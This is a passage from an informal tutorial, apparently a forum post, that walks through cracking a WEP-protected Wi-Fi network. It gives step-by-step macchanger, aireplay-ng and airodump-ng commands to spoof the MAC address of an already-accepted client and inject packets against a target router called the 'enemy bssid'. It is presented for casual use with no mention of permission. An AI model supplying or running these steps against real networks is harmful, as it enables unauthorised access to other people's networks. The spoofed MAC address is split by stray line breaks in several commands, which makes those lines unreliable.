apt-get install macchanger stop the airodump-ng from working. (i just hit ctrl+c and it stops) ifconfig wlan0 down >> the top half of the screen of the terminal of the airodump tell you the network you are gathering packets for, the bottom half lists mac addresses. important! with the picture above, im going to use the mac address 00:22:3F:7B

5:2C so, macchanger -m 00:22:3F:7B

5:2C wlan0
Now, your mac address is the same as a computer already accepted by the router! oooo... aww www.. now, we get to play with a program called aireplay-ng! aireplay-ng -3 -b 00:22:15:23:6E:E2 -h 00:22:3F:7B

5:2C wlan0 -What just happened? aireplay-ng works buy injecting packets into the router so u get more traffic btwn the computers. (speeds up the packet retrieval on the airodump-ng side) -3 is the attack type '00:22:3F:7B

5:2C' i just explained what i did above -b is the enemy bssid '00:22:15:23:6E:E2' -h is your spoofed (faked) mac addresss '00:22:3F:7B

5:2C' now, it will start injecting packets.. now start up airodump again and wait some more! airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0 (just in case you lost it) WOW! that, is how to crack a WEP key. i hoped you enjoyed this tut.